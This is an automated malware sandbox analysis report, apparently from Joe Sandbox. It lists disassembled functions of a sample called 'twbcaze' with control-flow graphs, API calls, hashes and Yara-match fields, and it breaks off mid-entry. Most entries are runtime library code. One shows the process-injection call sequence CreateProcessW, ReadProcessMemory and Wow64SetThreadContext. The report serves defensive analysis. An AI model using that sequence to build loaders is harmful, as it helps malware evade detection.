                                          • Opcode ID: 1e816ce87688622ec726282c4dafe4514aa4901fe74f977d836c6bbf6b1652ce
                                          • Instruction ID: 75a7b4c4e75e062102b4ceedb7ba9e3808390c4d46f14f64f2af66eaeb456fbf
                                          • Opcode Fuzzy Hash: 1e816ce87688622ec726282c4dafe4514aa4901fe74f977d836c6bbf6b1652ce
                                          • Instruction Fuzzy Hash: 2B210531A41221ABDB318B669C44BAB3768DF017E1F200223ED05A7390D738ED8196ED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041C17B Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 76 41c17b-41c194 77 41c196-41c1a6 call 413172 76->77 78 41c1aa-41c1af 76->78 77->78 84 41c1a8 77->84 80 41c1b1-41c1b9 78->80 81 41c1bc-41c1e4 call 41acef 78->81 80->81 86 41c342-41c353 call 40f907 81->86 87 41c1ea-41c1f6 81->87 84->78 89 41c1f8-41c1fd 87->89 90 41c22d 87->90 93 41c212-41c21d call 41aca1 89->93 94 41c1ff-41c208 call 40ff30 89->94 92 41c22f-41c231 90->92 96 41c337 92->96 97 41c237-41c24a call 41acef 92->97 104 41c228-41c22b 93->104 106 41c21f 93->106 94->104 105 41c20a-41c210 94->105 99 41c339-41c340 call 40fa74 96->99 97->96 110 41c250-41c262 call 41b89f 97->110 99->86 104->92 109 41c225 105->109 106->109 109->104 112 41c267-41c26b 110->112 112->96 113 41c271-41c279 112->113 114 41c2b3-41c2bf 113->114 115 41c27b-41c280 113->115 117 41c2c1-41c2c3 114->117 118 41c2f0 114->118 115->99 116 41c286-41c288 115->116 116->96 119 41c28e-41c2a8 call 41b89f 116->119 121 41c2c5-41c2ce call 40ff30 117->121 122 41c2d8-41c2e3 call 41aca1 117->122 120 41c2f2-41c2f4 118->120 119->99 134 41c2ae 119->134 124 41c330-41c336 call 40fa74 120->124 125 41c2f6-41c30f call 41b89f 120->125 121->124 136 41c2d0-41c2d6 121->136 122->124 133 41c2e5 122->133 124->96 125->124 139 41c311-41c318 125->139 138 41c2eb-41c2ee 133->138 134->96 136->138 138->120 140 41c354-41c35a 139->140 141 41c31a-41c31b 139->141 142 41c31c-41c32e call 41ad6b 140->142 141->142 142->124 145 41c35c-41c363 call 40fa74 142->145 145->99
                                          APIs
                                          • __alloca_probe_16.LIBCMT ref: 0041C1FF
                                          • __alloca_probe_16.LIBCMT ref: 0041C2C5
                                          • __freea.LIBCMT ref: 0041C331
                                            • Part of subcall function 0041ACA1: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E0E2,?,?,00401942,00000000,?,00401851), ref: 0041ACD3
                                          • __freea.LIBCMT ref: 0041C33A
                                          • __freea.LIBCMT ref: 0041C35D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                          • String ID:
                                          • API String ID: 1423051803-0
                                          • Opcode ID: cc80a806a169eab05e58413dacbc66e9f9c5e0c7cf95fe716d8602c99327d2d3
                                          • Instruction ID: 6d4edd65040881752d9885094900a985f24b8fe9645ab17a0ae6498ed45cbe57
                                          • Opcode Fuzzy Hash: cc80a806a169eab05e58413dacbc66e9f9c5e0c7cf95fe716d8602c99327d2d3
                                          • Instruction Fuzzy Hash: 50510672A4020AAFDB219F95CC81EFB37A9EF85754F15412BFC14A7240E738DC918699
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0023020A Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 425COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 148 23020a-230225 call 23005f 151 230228-23022c 148->151 152 230244-230251 151->152 153 23022e-230242 151->153 154 230254-230258 152->154 153->151 155 230270-23027d 154->155 156 23025a-23026e 154->156 157 230280-230284 155->157 156->154 158 230286-23029a 157->158 159 23029c-23037a call 230073 * 8 157->159 158->157 176 230391 159->176 177 23037c-230386 159->177 179 230395-2303b1 176->179 177->176 178 230388-23038f 177->178 178->179 181 2303b3-2303b5 179->181 182 2303ba 179->182 183 230734-230737 181->183 184 2303c1-2303e9 CreateProcessW 182->184 185 2303f0-230409 184->185 186 2303eb 184->186 193 230410-23042d ReadProcessMemory 185->193 194 23040b 185->194 187 2306e8-2306ec 186->187 188 230731-230733 187->188 189 2306ee-2306f2 187->189 188->183 191 230705-230709 189->191 192 2306f4-2306ff 189->192 195 230711-230715 191->195 196 23070b 191->196 192->191 197 230434-23043d 193->197 198 23042f 193->198 194->187 202 230717 195->202 203 23071d-230721 195->203 196->195 199 230464-230483 call 2311e1 197->199 200 23043f-23044e 197->200 198->187 212 230485 199->212 213 23048a-2304ab call 2312fb 199->213 200->199 206 230450-230456 call 23114c 200->206 202->203 204 230723-230728 call 23114c 203->204 205 23072d-23072f 203->205 204->205 205->183 211 23045b-23045d 206->211 211->199 214 23045f 211->214 212->187 217 2304f0-230510 call 2312fb 213->217 218 2304ad-2304b4 213->218 214->187 225 230512 217->225 226 230517-23052c call 2300da 217->226 220 2304b6-2304e2 call 2312fb 218->220 221 2304eb 218->221 227 2304e4 220->227 228 2304e9 220->228 221->187 225->187 231 230535-23053f 226->231 227->187 228->217 232 230571-230575 231->232 233 230541-23056f call 2300da 231->233 234 230655-230671 call 230f9a 232->234 235 23057b-230589 232->235 233->231 244 230673 234->244 245 230675-230696 Wow64SetThreadContext 234->245 235->234 237 23058f-23059d 235->237 237->234 241 2305a3-2305c3 237->241 243 2305c6-2305ca 241->243 243->234 248 2305d0-2305e5 243->248 244->187 246 23069a-2306a4 call 23109b 245->246 247 230698 245->247 254 2306a6 246->254 255 2306a8-2306ac 246->255 247->187 250 2305f7-2305fb 248->250 252 230638-230650 250->252 253 2305fd-230609 250->253 252->243 256 230636 253->256 257 23060b-230634 253->257 254->187 258 2306b4-2306b8 255->258 259 2306ae 255->259 256->250 257->256 261 2306c0-2306c4 258->261 262 2306ba 258->262 259->258 263 2306c6 261->263 264 2306cc-2306d0 261->264 262->261 263->264 265 2306d2-2306d7 call 23114c 264->265 266 2306dc-2306e2 264->266 265->266 266->184 266->187
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: D
                                          • API String ID: 0-2746444292
                                          • Opcode ID: 5f82a25b001eef986d9a981a6cbd625316d3570d34d0e9bba76da4b8eb28fee1
                                          • Instruction ID: 913c8fc3ac625a1fee3869133194d008a953afd73022a5488c343fd139ce26f0
                                          • Opcode Fuzzy Hash: 5f82a25b001eef986d9a981a6cbd625316d3570d34d0e9bba76da4b8eb28fee1
                                          • Instruction Fuzzy Hash: 3102F4B0E20209EFDF14CF94C995BADBBB5BF08705F204059E515BA2A1D774AEA0DF24
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004220EF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 268 4220ef-422104 LoadLibraryExW 269 422106-42210f GetLastError 268->269 270 422138-422139 268->270 271 422111-422125 call 41eaba 269->271 272 422136 269->272 271->272 275 422127-422135 LoadLibraryExW 271->275 272->270
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,0042218B,00000000,?,00432FF0,?,?,?,004220C2,00000004,InitializeCriticalSectionEx,00429534,0042953C), ref: 004220FC
                                          • GetLastError.KERNEL32(?,0042218B,00000000,?,00432FF0,?,?,?,004220C2,00000004,InitializeCriticalSectionEx,00429534,0042953C,00000000,?,0041A94C), ref: 00422106
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0042212E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID: api-ms-
                                          • API String ID: 3177248105-2084034818
                                          • Opcode ID: 59a04169ea6d4d95635d84a846355b1e456eb0b3a79eec30dccb626f617f785e
                                          • Instruction ID: fc242c96d07ba1ba5137a2309fdb626edb44cf858da1c29ccb6cba67ef9a6a2c
                                          • Opcode Fuzzy Hash: 59a04169ea6d4d95635d84a846355b1e456eb0b3a79eec30dccb626f617f785e
                                          • Instruction Fuzzy Hash: 6AE01270780204BAEB301F52EC06F6A7B66AF10B91F904032FA4CA41E0D7B59CA1D58D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041C953 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 314 41c953-41c97d call 41c8b3 call 41c7dd 319 41c983-41c998 call 41aca1 314->319 320 41c97f-41c982 314->320 323 41c9c8 319->323 324 41c99a-41c9b0 call 41c5ea 319->324 325 41c9ca-41c9d7 call 41ac67 323->325 328 41c9b5-41c9bb 324->328 330 41c9d8-41c9dc 328->330 331 41c9bd-41c9c2 call 415317 328->331 332 41c9e3-41c9ee 330->332 333 41c9de call 41357b 330->333 331->323 336 41c9f0-41c9fa 332->336 337 41ca05-41ca23 332->337 333->332 336->337 339 41c9fc-41ca04 call 41ac67 336->339 337->325 340 41ca25-41ca52 call 41cca8 337->340 339->337 340->325 345 41ca58-41ca62 340->345 345->325
                                          APIs
                                            • Part of subcall function 0041C7DD: GetOEMCP.KERNEL32(00000000,0041C96E,00000000,00000000,0042190B,0042190B,00000000,00000000,00000000), ref: 0041C808
                                          • _free.LIBCMT ref: 0041C9CB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: (U
                                          • API String ID: 269201875-1038552597
                                          • Opcode ID: cec2dc70aef15dcc1e193a349e072108923eab96f25ae85ad9b128b179b5290a
                                          • Instruction ID: 21ae2229421282a0f34250d89c358c044478b6e29def4b0f04777ce2107de751
                                          • Opcode Fuzzy Hash: cec2dc70aef15dcc1e193a349e072108923eab96f25ae85ad9b128b179b5290a
                                          • Instruction Fuzzy Hash: A2319CB2900209AFCB01DF69C881ADF77A5EF44354F11406BF9159B3A1EB3A9D91CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041CB28 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 363 41cb28-41cb4a 364 41cb50-41cb62 GetCPInfo 363->364 365 41cc5c-41cc63 363->365 364->365 366 41cb68-41cb6f 364->366 367 41cc65-41cc6e 365->367 368 41cb71-41cb7b 366->368 369 41cc70-41cc78 367->369 370 41cc7a-41cc7d 367->370 368->368 371 41cb7d-41cb90 368->371 372 41cc8d-41cc97 369->372 373 41cc8b 370->373 374 41cc7f-41cc89 370->374 376 41cbb1-41cbb3 371->376 372->367 375 41cc99-41cca7 call 40f907 372->375 373->372 374->372 378 41cb92-41cb99 376->378 379 41cbb5-41cbec call 41c02f call 41c132 376->379 381 41cba8-41cbaa 378->381 388 41cbf1-41cc1c call 41c132 379->388 383 41cb9b-41cb9d 381->383 384 41cbac-41cbaf 381->384 383->384 387 41cb9f-41cba7 383->387 384->376 387->381 391 41cc1e-41cc29 388->391 392 41cc39-41cc3c 391->392 393 41cc2b-41cc37 391->393 395 41cc4c 392->395 396 41cc3e-41cc4a 392->396 394 41cc4e-41cc58 393->394 394->391 397 41cc5a 394->397 395->394 396->394 397->375
                                          APIs
                                          • GetCPInfo.KERNEL32(E8458D00,?,0000000C,00000000,00000000), ref: 0041CB5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Info
                                          • String ID:
                                          • API String ID: 1807457897-3916222277
                                          • Opcode ID: 855a859752abcec589858d9807460375745186d6f5beff0676cc2bfde8d4a19d
                                          • Instruction ID: a96c3065caeaac77d3f74e8a83fe439cdd8a73e50797608b124c6a1eeaa8ad91
                                          • Opcode Fuzzy Hash: 855a859752abcec589858d9807460375745186d6f5beff0676cc2bfde8d4a19d
                                          • Instruction Fuzzy Hash: DE4149B01442489BDB218F18CDC4BF77BED9B05304F2404AEE5CEC7142E239AD85DBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041B81C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 398 41b81c-41b83f call 41bab5 401 41b841-41b854 398->401 402 41b856-41b85c InitializeCriticalSectionAndSpinCount 398->402 403 41b862-41b864 401->403 402->403
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?), ref: 0041B85C
                                          Strings
                                          • InitializeCriticalSectionEx, xrefs: 0041B82C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountCriticalInitializeSectionSpin
                                          • String ID: InitializeCriticalSectionEx
                                          • API String ID: 2593887523-3084827643
                                          • Opcode ID: f9072bed2894d461a612be17e23af7c58d594345834647678f603cfa8b89610f
                                          • Instruction ID: 2bbf1eba4325091a8f805affcf2631c9889cc8d83d0959772aab057c07b2e122
                                          • Opcode Fuzzy Hash: f9072bed2894d461a612be17e23af7c58d594345834647678f603cfa8b89610f
                                          • Instruction Fuzzy Hash: 6FE09231641228B7DF113F51EC05EDE7F16EB44BA0F508066FA1815171CB754861ABD8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041B6A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 406 41b6a2-41b6b9 call 41bab5 408 41b6be-41b6c5 406->408 409 41b6c7-41b6d4 408->409 410 41b6d6 TlsAlloc 408->410 411 41b6dc-41b6de 409->411 410->411
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc
                                          • API String ID: 2773662609-671089009
                                          • Opcode ID: b40d68b16dcda4e9474c7c98bf42229f5c6d560e9727103d880ce395b472c8ac
                                          • Instruction ID: 2f77c67e21683032b7867c90a944dd36eb87b62326515653e0abd7e7556b6c66
                                          • Opcode Fuzzy Hash: b40d68b16dcda4e9474c7c98bf42229f5c6d560e9727103d880ce395b472c8ac
                                          • Instruction Fuzzy Hash: 8DE0C231B8223467822136527D06ADEBE05DB70BE0B514027F90861241DFA948818ADE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041C5EA Relevance: 3.2, APIs: 2, Instructions: 166COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 414 41c5ea-41c60f call 41c7dd 417 41c7c5-41c7c6 call 41c84e 414->417 418 41c615-41c61b 414->418 421 41c7cb-41c7cd 417->421 420 41c61e-41c624 418->420 422 41c62a-41c636 420->422 423 41c71d-41c73c call 4128a0 420->423 425 41c7ce-41c7dc call 40f907 421->425 422->420 426 41c638-41c63e 422->426 431 41c73f-41c744 423->431 429 41c715-41c718 426->429 430 41c644-41c650 IsValidCodePage 426->430 429->425 430->429 433 41c656-41c65d 430->433 434 41c746-41c74b 431->434 435 41c77b-41c785 431->435 436 41c685-41c692 GetCPInfo 433->436 437 41c65f-41c66b 433->437 440 41c778 434->440 441 41c74d-41c753 434->441 435->431 442 41c787-41c7ae call 41caea 435->442 438 41c694-41c6b3 call 4128a0 436->438 439 41c709-41c70f 436->439 443 41c66f-41c67b call 41cb28 437->443 438->443 453 41c6b5-41c6bc 438->453 439->417 439->429 440->435 445 41c76c-41c76e 441->445 455 41c7af-41c7be 442->455 452 41c680 443->452 449 41c770-41c776 445->449 450 41c755-41c75b 445->450 449->434 449->440 450->449 454 41c75d-41c768 450->454 452->421 457 41c6df-41c6e2 453->457 458 41c6be-41c6c3 453->458 454->445 455->455 456 41c7c0 455->456 456->417 460 41c6e7-41c6ee 457->460 458->457 459 41c6c5-41c6cb 458->459 461 41c6d3-41c6d5 459->461 460->460 462 41c6f0-41c704 call 41caea 460->462 463 41c6d7-41c6dd 461->463 464 41c6cd-41c6d2 461->464 462->443 463->457 463->458 464->461
                                          APIs
                                            • Part of subcall function 0041C7DD: GetOEMCP.KERNEL32(00000000,0041C96E,00000000,00000000,0042190B,0042190B,00000000,00000000,00000000), ref: 0041C808
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,0041C9B5,00000000,00000000,00000000,?,00000000,?,?,?,0042190B), ref: 0041C648
                                          • GetCPInfo.KERNEL32(00000000,0041C9B5,?,?,0041C9B5,00000000,00000000,00000000,?,00000000,?,?,?,0042190B,00000000,00000000), ref: 0041C68A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID:
                                          • API String ID: 546120528-0
                                          • Opcode ID: 0c3d3d7acd6dd14b59517c8ab4072126db1735044733578a7a9a37ad46e82433
                                          • Instruction ID: 7c52d88972ac2dace6bcdf081ad171f92710c8c916e3215b7aff95bd971f8e57
                                          • Opcode Fuzzy Hash: 0c3d3d7acd6dd14b59517c8ab4072126db1735044733578a7a9a37ad46e82433
                                          • Instruction Fuzzy Hash: 9F510370A803469EDB218F66CCC16FBBBE5AF51304F14406FD09687291E7B89982CF99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0042213A Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 467 42213a-422155 468 422157-422159 467->468 469 42215b-42215d 467->469 470 4221b1-4221b3 468->470 469->470 471 42215f-422164 469->471 472 4221a3-4221a6 471->472 473 422166-422177 472->473 474 4221a8-4221ad 472->474 476 422179-42217b 473->476 477 42217f-422186 call 4220ef 473->477 475 4221af-4221b0 474->475 475->470 478 4221c3-4221cf GetProcAddress 476->478 479 42217d 476->479 483 42218b-42219a 477->483 478->474 481 4221d1-4221d8 478->481 482 4221a0 479->482 481->475 482->472 484 4221b4-4221ba 483->484 485 42219c-42219e 483->485 484->478 486 4221bc-4221bd FreeLibrary 484->486 485->482 486->478
                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,?,00432FF0,?,?,?,004220C2,00000004,InitializeCriticalSectionEx,00429534,0042953C,00000000,?,0041A94C,00432FF0,00000FA0), ref: 004221BD
                                          • GetProcAddress.KERNEL32(00000000,?,?,00432FF0,?,?,?,004220C2,00000004,InitializeCriticalSectionEx,00429534,0042953C,00000000,?,0041A94C,00432FF0), ref: 004221C7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressFreeLibraryProc
                                          • String ID:
                                          • API String ID: 3013587201-0
                                          • Opcode ID: 5e6590639f837f3f74b4bd3a25c60f29f496a02501eb8b08b72b8ada3bcd0099
                                          • Instruction ID: 309f8aec9f5dc071c213e6da4586d0d84bc111e18403b1771997db904bcccf5e
                                          • Opcode Fuzzy Hash: 5e6590639f837f3f74b4bd3a25c60f29f496a02501eb8b08b72b8ada3bcd0099
                                          • Instruction Fuzzy Hash: 00117F36701125BF9F22CF54ED80DAA73A4EB463507940266EA01DB350E674EE62CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004199D4 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 487 4199d4-4199d9 call 421fb9 489 4199de-4199e7 487->489 490 4199e9-4199eb 489->490 491 4199ec-4199fb call 42206a 489->491 494 419a04-419a06 491->494 495 4199fd-419a02 call 419a07 491->495 495->490
                                          APIs
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004199F2
                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 004199FD
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                          • String ID:
                                          • API String ID: 1660781231-0
                                          • Opcode ID: 95239937f6728c2ab273cbb288612d97b27c62561239d8ac005eaa4639cae67a
                                          • Instruction ID: b388f827fee2bdd613f80f24e28f98c854151017074bbf60c3304b4d43f3c84a
                                          • Opcode Fuzzy Hash: 95239937f6728c2ab273cbb288612d97b27c62561239d8ac005eaa4639cae67a
                                          • Instruction Fuzzy Hash: 41D0A775704383648D1436B239335DB22842C11BF43B0134FE020852D2FB9C88C4601D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BAB5 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efe380341a0ec7d5170a2d1c18936f96d49b48d58a511d61a9babb171d4075cd
                                          • Instruction ID: d90ecc263459b9024e9a5ab86625f60e66499811c376325d538ba221564ca309
                                          • Opcode Fuzzy Hash: efe380341a0ec7d5170a2d1c18936f96d49b48d58a511d61a9babb171d4075cd
                                          • Instruction Fuzzy Hash: 0301F5337042116F9B168E6AED80ADB33D6EB843607144126F905CB668EB38E88687D9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00420C7F Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041BD43: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0041B00A,00000001,00000364,00000005,000000FF,?,?,?,0041531C,0041ACE4,?), ref: 0041BD84
                                          • _free.LIBCMT ref: 00420CEE
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: ca24e7fb0318055d8d14544885d4b33f3381520c0c2db4bc62b6f3ec6a8be3c9
                                          • Instruction ID: e859af2a5ef6ee809bec15339cd08cbb7ee5ae1fd0eb6685ca64927a6fa89387
                                          • Opcode Fuzzy Hash: ca24e7fb0318055d8d14544885d4b33f3381520c0c2db4bc62b6f3ec6a8be3c9
                                          • Instruction Fuzzy Hash: 91012BB26043266BC3208F6AD481ACAFBD8FB04770F54072EE555A77C1E3746810C7E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00230838 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 002307DA: GetSystemInfo.KERNELBASE(?), ref: 002307F7
                                          • VirtualAllocExNuma.KERNELBASE(00000000), ref: 0023089D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocInfoNumaSystemVirtual
                                          • String ID:
                                          • API String ID: 449148690-0
                                          • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                          • Instruction ID: f31b1920cab429323816aaa73a1dcd5f9a0a2f8b694d18ebbeaa0ff08696d504
